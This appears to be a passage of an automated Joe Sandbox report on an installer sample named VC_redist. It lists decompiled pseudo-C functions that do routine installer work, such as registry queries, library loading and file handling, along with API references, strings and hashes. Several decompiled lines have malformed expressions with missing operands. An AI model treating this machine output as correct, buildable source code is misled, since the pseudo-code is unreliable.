					_t39 = _t31;
					if(_t31 < 0) {
						goto L10;
					} else {
						_t38 = 0x104;
						goto L6;
					}
				}
				L1:
				_t27 = GetLastError();
				_t39 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
				if(( <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000) >= 0) {
					_t39 = 0x80004005;
				}
				goto L10;
			}





















                                                                          0x000b37ea
                                                                          0x000b37f3
                                                                          0x000b37fa
                                                                          0x000b37fe
                                                                          0x000b3809
                                                                          0x000b3814
                                                                          0x000b3822
                                                                          0x000b3829
                                                                          0x000b3831
                                                                          0x000b3854
                                                                          0x000b385d
                                                                          0x000b387e
                                                                          0x000b3889
                                                                          0x000b388e
                                                                          0x000b3892
                                                                          0x000b38bf
                                                                          0x000b38d1
                                                                          0x000b38d1
                                                                          0x000b389b
                                                                          0x000b38a1
                                                                          0x000b38a5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b38a9
                                                                          0x000b38b8
                                                                          0x000b38bd
                                                                          0x000b38bd
                                                                          0x00000000
                                                                          0x000b38a9
                                                                          0x000b386e
                                                                          0x000b3873
                                                                          0x000b3877
                                                                          0x00000000
                                                                          0x000b3879
                                                                          0x000b3879
                                                                          0x00000000
                                                                          0x000b3879
                                                                          0x000b3877
                                                                          0x000b3833
                                                                          0x000b3833
                                                                          0x000b3844
                                                                          0x000b3849
                                                                          0x000b384b
                                                                          0x000b384b
                                                                          0x00000000

                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 000B3829
                                                                          • GetLastError.KERNEL32 ref: 000B3833
                                                                          • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 000B389B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                          • String ID: @Met
                                                                          • API String ID: 1230559179-2381362037
                                                                          • Opcode ID: 64fe028a5adf4af5a3c3126b64e24fc256efe02ffeaff4b2432e211c2caacc6a
                                                                          • Instruction ID: 263460203e0dbb1a27bb0f093377457721adc6acba4d12817ec995ecd7f18033
                                                                          • Opcode Fuzzy Hash: 64fe028a5adf4af5a3c3126b64e24fc256efe02ffeaff4b2432e211c2caacc6a
                                                                          • Instruction Fuzzy Hash: B821AAB2D0132967EB20AB64DC45FDAB7ACAF04710F254165BE14E7241EA35DE448BE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D88CF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 34%
                                                                          			E000D88CF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				signed int _v12;
				void* _t26;
				void* _t28;
				void* _t36;
				intOrPtr* _t44;
				void* _t47;

				_t39 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t26 = E000F0E3F(_a8, _a12, 0x20019,  &_v8); // executed
				if(_t26 >= 0) {
					_t28 = E000D8458(_v8, _a16,  &_v12); // executed
					if(_t28 < 0 || _v12 == 0) {
						_t47 = 0x80070490;
					} else {
						_t44 = _a20;
						_t47 = E000B38F6( *(_t44 + 4) + 1, _t39, _t44,  *(_t44 + 4) + 1, 0xf8, 5);
						if(_t47 >= 0) {
							_t36 = E000D899C(_t39, _a12, _v8, _a4, _v12,  *(_t44 + 4) * 0xf8 +  *_t44); // executed
							_t47 = _t36;
							if(_t47 >= 0) {
								 *(_t44 + 4) =  *(_t44 + 4) + 1;
							} else {
								_push(_a12);
								_push("Failed to initialize package from related bundle id: %ls");
								goto L2;
							}
						} else {
							_push("Failed to ensure there is space for related bundles.");
							_push(_t47);
							E000F012F();
						}
					}
				} else {
					_push(_a12);
					_push("Failed to open uninstall key for potential related bundle: %ls");
					L2:
					_push(_t47);
					E000F012F();
				}
				if(_v8 != 0) {
					RegCloseKey(_v8); // executed
				}
				return _t47;
			}










                                                                          0x000d88cf
                                                                          0x000d88d2
                                                                          0x000d88d3
                                                                          0x000d88d4
                                                                          0x000d88db
                                                                          0x000d88ed
                                                                          0x000d88f6
                                                                          0x000d8915
                                                                          0x000d891c
                                                                          0x000d897e
                                                                          0x000d8924
                                                                          0x000d8924
                                                                          0x000d8939
                                                                          0x000d893d
                                                                          0x000d8964
                                                                          0x000d8969
                                                                          0x000d896d
                                                                          0x000d8979
                                                                          0x000d896f
                                                                          0x000d896f
                                                                          0x000d8972
                                                                          0x00000000
                                                                          0x000d8972
                                                                          0x000d893f
                                                                          0x000d893f
                                                                          0x000d8944
                                                                          0x000d8945
                                                                          0x000d894b
                                                                          0x000d893d
                                                                          0x000d88f8
                                                                          0x000d88f8
                                                                          0x000d88fb
                                                                          0x000d8900
                                                                          0x000d8900
                                                                          0x000d8901
                                                                          0x000d8906
                                                                          0x000d8987
                                                                          0x000d898c
                                                                          0x000d898c
                                                                          0x000d8999

                                                                          APIs
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          • RegCloseKey.KERNELBASE(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,000D8C14,00000000,00000000), ref: 000D898C
                                                                          Strings
                                                                          • Failed to initialize package from related bundle id: %ls, xrefs: 000D8972
                                                                          • Failed to ensure there is space for related bundles., xrefs: 000D893F
                                                                          • Failed to open uninstall key for potential related bundle: %ls, xrefs: 000D88FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                          • API String ID: 47109696-1717420724
                                                                          • Opcode ID: ec20cf598f483025189c68a91a9d86fd7c0742fc136198271e9f7bd78d3b5be4
                                                                          • Instruction ID: 12123efdfbd27f15b1e00d41899a96e0526fdcfc80b0c76fbbde9072da889546
                                                                          • Opcode Fuzzy Hash: ec20cf598f483025189c68a91a9d86fd7c0742fc136198271e9f7bd78d3b5be4
                                                                          • Instruction Fuzzy Hash: 53217432940319BBDB129A84CC15BFEBB78FB00710F188156F94066251DB719D20EBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C3955 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000C3955(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a4) {
				void* _v8;
				void* _v12;
				void* _t12;
				signed short* _t13;
				signed int* _t21;
				signed short* _t22;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t30;

				_v8 = 0;
				_v12 = 0;
				_t12 = E000F0E3F(0x80000002, L"SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", 0x20019,  &_v8); // executed
				if(_t12 < 0 || E000F0F6E(_v8, L"Logging",  &_v12) < 0) {
					_t13 = _v12;
				} else {
					_t13 = _v12;
					_t22 = _t13;
					if( *_t13 != 0) {
						_t21 = _a4;
						do {
							_t30 =  *_t22 & 0x0000ffff;
							_t24 = 0x76;
							if(_t24 == _t30) {
								L9:
								 *_t21 =  *_t21 | 0x00000002;
							} else {
								_t26 = 0x56;
								if(_t26 == _t30) {
									goto L9;
								} else {
									_t27 = 0x78;
									if(_t27 == _t30) {
										L8:
										 *_t21 =  *_t21 | 0x00000004;
									} else {
										_t28 = 0x58;
										if(_t28 == _t30) {
											goto L8;
										}
									}
								}
							}
							_t22 =  &(_t22[1]);
						} while ( *_t22 != 0);
					}
				}
				if(_t13 != 0) {
					_t13 = E000F54EF(_t13);
				}
				if(_v8 != 0) {
					return RegCloseKey(_v8);
				}
				return _t13;
			}














                                                                          0x000c3970
                                                                          0x000c3973
                                                                          0x000c3976
                                                                          0x000c397d
                                                                          0x000c39da
                                                                          0x000c3994
                                                                          0x000c3994
                                                                          0x000c3997
                                                                          0x000c399c
                                                                          0x000c399e
                                                                          0x000c39a3
                                                                          0x000c39a3
                                                                          0x000c39a8
                                                                          0x000c39ac
                                                                          0x000c39cb
                                                                          0x000c39cb
                                                                          0x000c39ae
                                                                          0x000c39b0
                                                                          0x000c39b4
                                                                          0x00000000
                                                                          0x000c39b6
                                                                          0x000c39b8
                                                                          0x000c39bc
                                                                          0x000c39c6
                                                                          0x000c39c6
                                                                          0x000c39be
                                                                          0x000c39c0
                                                                          0x000c39c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c39c4
                                                                          0x000c39bc
                                                                          0x000c39b4
                                                                          0x000c39ce
                                                                          0x000c39d1
                                                                          0x000c39d7
                                                                          0x000c399c
                                                                          0x000c39e0
                                                                          0x000c39e3
                                                                          0x000c39e3
                                                                          0x000c39ec
                                                                          0x00000000
                                                                          0x000c39f1
                                                                          0x000c39fa

                                                                          APIs
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,000C3E61,feclient.dll,?,00000000,?,?,?,000B4A0C), ref: 000C39F1
                                                                            • Part of subcall function 000F0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,?), ref: 000F0FE4
                                                                            • Part of subcall function 000F0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 000F101F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$CloseOpen
                                                                          • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                          • API String ID: 1586453840-3596319545
                                                                          • Opcode ID: 3703ed82623b4b83a3d9dde9c6c9393ab95d196d285619d916b968dd3e470fd5
                                                                          • Instruction ID: ca17c9f0742e022bd1ff4e9f33aa40e35d16f5b63b40e5cd58e25d9e6948a40a
                                                                          • Opcode Fuzzy Hash: 3703ed82623b4b83a3d9dde9c6c9393ab95d196d285619d916b968dd3e470fd5
                                                                          • Instruction Fuzzy Hash: 3611B633B50208BBDB219B95DD47FBEB7B8EB00B41F50806AE50197090D6F15F81E750
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F47D3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 89%
                                                                          			E000F47D3(void* __ecx, void* _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				void* _v12;
				int _t11;
				intOrPtr* _t12;
				void* _t21;

				_push(_a20);
				_t21 = 0;
				_t11 = SetFilePointerEx(_a4, _a8, _a12,  &_v12); // executed
				if(_t11 != 0) {
					_t12 = _a16;
					if(_t12 != 0) {
						 *_t12 = _v12;
						 *((intOrPtr*)(_t12 + 4)) = _v8;
					}
				} else {
					_t25 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					_t21 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "fileutil.cpp", 0x20a, _t21);
				}
				return _t21;
			}








                                                                          0x000f47d9
                                                                          0x000f47df
                                                                          0x000f47eb
                                                                          0x000f47f3
                                                                          0x000f4825
                                                                          0x000f482a
                                                                          0x000f482f
                                                                          0x000f4834
                                                                          0x000f4834
                                                                          0x000f47f5
                                                                          0x000f4806
                                                                          0x000f4810
                                                                          0x000f481e
                                                                          0x000f481e
                                                                          0x000f483d

                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,?,00000000,00000000,00000000,?,000F6219,?,?,00000000,00000000,00000000,00000001), ref: 000F47EB
                                                                          • GetLastError.KERNEL32(?,000F6219,?,?,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,000F5AC5,?,?,?), ref: 000F47F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 2976181284-2299628883
                                                                          • Opcode ID: e7a027a22b501216edf91b4da98c2ff0c789ef4634b40b9d25bf9f4f6af85c13
                                                                          • Instruction ID: 7dfb20f9647424ae98023ccc326882b68fe2839accea8b82e6e4cc1f2908c984
                                                                          • Opcode Fuzzy Hash: e7a027a22b501216edf91b4da98c2ff0c789ef4634b40b9d25bf9f4f6af85c13
                                                                          • Instruction Fuzzy Hash: 48F01D71A00259ABAB249F95DC05DBB7BE8EF04790B014169BD0597650DA31DD11EAE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B3999 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000B3999(void* _a4) {
				char _t3;
				long _t6;

				_t6 = 0;
				_t3 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
				if(_t3 == 0) {
					_t6 =  <=  ? GetLastError() : _t5 & 0x0000ffff | 0x80070000;
				}
				return _t6;
			}





                                                                          0x000b39a0
                                                                          0x000b39aa
                                                                          0x000b39b2
                                                                          0x000b39c5
                                                                          0x000b39c5
                                                                          0x000b39cc

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000,?,000B3B34,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511), ref: 000B39A3
                                                                          • RtlFreeHeap.NTDLL(00000000,?,000B3B34,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511,?,?), ref: 000B39AA
                                                                          • GetLastError.KERNEL32(?,000B3B34,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511,?,?,00000001), ref: 000B39B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ErrorFreeLastProcess
                                                                          • String ID: @Met
                                                                          • API String ID: 406640338-2381362037
                                                                          • Opcode ID: ce14d319966e1f07fe76d653b1fbe693f03e23098b113f245935c607eb63cc52
                                                                          • Instruction ID: 2abc684aac260edeb26f81f7c2b25133c4bc96c74fe2ad3f503725ac8e883b0b
                                                                          • Opcode Fuzzy Hash: ce14d319966e1f07fe76d653b1fbe693f03e23098b113f245935c607eb63cc52
                                                                          • Instruction Fuzzy Hash: 40D05B326002346797206BFADC0CAA7BEDCFF456E17414022FD05D2510D739C810DAF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C55BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 000C55D9
                                                                          • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 000C5633
                                                                          Strings
                                                                          • Failed to initialize COM on cache thread., xrefs: 000C55E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: Failed to initialize COM on cache thread.
                                                                          • API String ID: 3442037557-3629645316
                                                                          • Opcode ID: eb0d26fbed55edbb77497e62a055b8d2b0aedf65299b22f52d934f391ecce094
                                                                          • Instruction ID: 0241919937b621b1a81c796bc37af819f8f3fd1caea64b2e930fcd2782b3c73f
                                                                          • Opcode Fuzzy Hash: eb0d26fbed55edbb77497e62a055b8d2b0aedf65299b22f52d934f391ecce094
                                                                          • Instruction Fuzzy Hash: 35018472600619BFC7058FA5DC80EEAF7ACFF08354B408126FA09D7121DB31AE54DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B501B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000B501B(signed short* _a4) {
				signed int _t8;
				int _t9;
				int _t12;
				signed int _t13;
				short* _t15;
				signed int _t16;
				signed short* _t17;
				int _t19;

				_t8 =  *0x11aa50; // 0x1
				_t15 = L"burn.clean.room";
				_t19 = 1;
				if((_t8 & 0x00000001) != 0) {
					_t9 =  *0x11aa4c; // 0xf
				} else {
					 *0x11aa50 = _t8 | 1;
					_t9 = lstrlenW(_t15);
					 *0x11aa4c = _t9;
				}
				_t17 = _a4;
				if(_t17 == 0) {
					L8:
					_t19 = 0;
				} else {
					_t16 =  *_t17 & 0x0000ffff;
					if(_t16 == 0x2d || _t16 == 0x2f) {
						_t12 = CompareStringW(0x7f, _t19,  &(_t17[1]), _t9, _t15, _t9); // executed
						if(_t12 != 2) {
							goto L8;
						} else {
							_t13 =  *0x11aa4c; // 0xf
							if( *((short*)(_t17 + 2 + _t13 * 2)) != 0x3d) {
								goto L8;
							}
						}
					} else {
						goto L8;
					}
				}
				return _t19;
			}











                                                                          0x000b501e
                                                                          0x000b5027
                                                                          0x000b502c
                                                                          0x000b5030
                                                                          0x000b5047
                                                                          0x000b5032
                                                                          0x000b5035
                                                                          0x000b503a
                                                                          0x000b5040
                                                                          0x000b5040
                                                                          0x000b504c
                                                                          0x000b5051
                                                                          0x000b5082
                                                                          0x000b5082
                                                                          0x000b5053
                                                                          0x000b5053
                                                                          0x000b5059
                                                                          0x000b506a
                                                                          0x000b5073
                                                                          0x00000000
                                                                          0x000b5075
                                                                          0x000b5075
                                                                          0x000b5080
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5080
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5059
                                                                          0x000b508a

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,000B1104,?,?,00000000), ref: 000B503A
                                                                          • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,000B1104,?,?,00000000), ref: 000B506A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareStringlstrlen
                                                                          • String ID: burn.clean.room
                                                                          • API String ID: 1433953587-3055529264
                                                                          • Opcode ID: 288489b6ab776a08443ea780a1bbe42871ec58f247f381dc22d95e84968b8f99
                                                                          • Instruction ID: 61665ac76cde41da06dbdf4c4a914852d40c68e5fa5a252a338a43976104a95a
                                                                          • Opcode Fuzzy Hash: 288489b6ab776a08443ea780a1bbe42871ec58f247f381dc22d95e84968b8f99
                                                                          • Instruction Fuzzy Hash: 8A01F972510625AE83345B58ED84EF3BBECFF047617548116F645C3A10C3709C80DBE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000CE7EB Relevance: 4.5, APIs: 3, Instructions: 19synchronizationwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000CE7EB(intOrPtr _a4) {
				int _t5;
				intOrPtr _t8;

				_t8 = _a4;
				_t5 = IsWindow( *(_t8 + 0x3e0));
				if(_t5 != 0) {
					PostMessageW( *(_t8 + 0x3e0), 0x10, 0, 0); // executed
					return WaitForSingleObject( *(_t8 + 0x3e4), 0x3a98);
				}
				return _t5;
			}





                                                                          0x000ce7ef
                                                                          0x000ce7f8
                                                                          0x000ce800
                                                                          0x000ce80e
                                                                          0x00000000
                                                                          0x000ce81f
                                                                          0x000ce827

                                                                          APIs
                                                                          • IsWindow.USER32(?), ref: 000CE7F8
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000CE80E
                                                                          • WaitForSingleObject.KERNEL32(?,00003A98,?,000B4B37,?,?,?,?,?,000FB490,?,?,?,?,?,?), ref: 000CE81F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: MessageObjectPostSingleWaitWindow
                                                                          • String ID:
                                                                          • API String ID: 1391784381-0
                                                                          • Opcode ID: 41cb965d634bded3cdaa1857a531d8a3305a41a389eb0f6dacdd93dc91a71a1f
                                                                          • Instruction ID: 5b7fa5e8a5fe71dcc21fba205abc6f153cbc223202e167769e38cc794bfc5a56
                                                                          • Opcode Fuzzy Hash: 41cb965d634bded3cdaa1857a531d8a3305a41a389eb0f6dacdd93dc91a71a1f
                                                                          • Instruction Fuzzy Hash: 97E08C31280308BBE7221B60DC09FEA7BACFB08751F080529B249A50E0C7A67A10EB84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F124D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E000F124D(void* _a4, short* _a8, char** _a12) {
				int _v8;
				char _v12;
				int _v16;
				signed short _t20;
				void* _t23;
				int* _t25;
				signed short _t31;
				int* _t34;
				void* _t35;

				_t33 = _a12;
				_v16 = 8;
				_v8 = 0;
				_t34 = 0;
				_v12 = 0;
				_t20 = RegQueryValueExW(_a4, _a8, 0,  &_v8,  *_a12,  &_v16); // executed
				_t31 = _t20;
				_t23 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
				if(_t23 != 0x80070002) {
					if(_v8 == 1 || _v8 == 2) {
						_t25 = E000F0F6E(_a4, _a8,  &_v12); // executed
						_t34 = _t25;
						if(_t34 >= 0) {
							_t34 = E000F4B5A(0x80070002, _v12, 0, _t33);
						}
						goto L11;
					} else {
						if(_v8 != 0xb) {
							_t34 = 0x8007070c;
							_push(0x8007070c);
							_push(0x27e);
							L7:
							_push("regutil.cpp");
							E000B37D3(_t23);
							L11:
							if(_v12 != 0) {
								E000F54EF(_v12);
							}
							return _t34;
						}
						if(_t31 == 0) {
							goto L11;
						}
						_t35 = _t23;
						_t23 = 0x80004005;
						_t34 =  >=  ? 0x80004005 : _t35;
						_push(_t34);
						_push(0x279);
						goto L7;
					}
				}
				_t34 = 0x80070002;
				goto L11;
			}












                                                                          0x000f1256
                                                                          0x000f125f
                                                                          0x000f1269
                                                                          0x000f126e
                                                                          0x000f1270
                                                                          0x000f127b
                                                                          0x000f1281
                                                                          0x000f1292
                                                                          0x000f1297
                                                                          0x000f12a1
                                                                          0x000f12e8
                                                                          0x000f12ed
                                                                          0x000f12f1
                                                                          0x000f12fd
                                                                          0x000f12fd
                                                                          0x00000000
                                                                          0x000f12a9
                                                                          0x000f12ad
                                                                          0x000f12d1
                                                                          0x000f12d6
                                                                          0x000f12d7
                                                                          0x000f12c5
                                                                          0x000f12c5
                                                                          0x000f12ca
                                                                          0x000f12ff
                                                                          0x000f1302
                                                                          0x000f1307
                                                                          0x000f1307
                                                                          0x000f1314
                                                                          0x000f1314
                                                                          0x000f12b1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f12b3
                                                                          0x000f12b5
                                                                          0x000f12bc
                                                                          0x000f12bf
                                                                          0x000f12c0
                                                                          0x00000000
                                                                          0x000f12c0
                                                                          0x000f12a1
                                                                          0x000f1299
                                                                          0x00000000

                                                                          APIs
                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000008,00000000,00000000,00000000,000000B0,000002C0,00000000,00000000), ref: 000F127B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
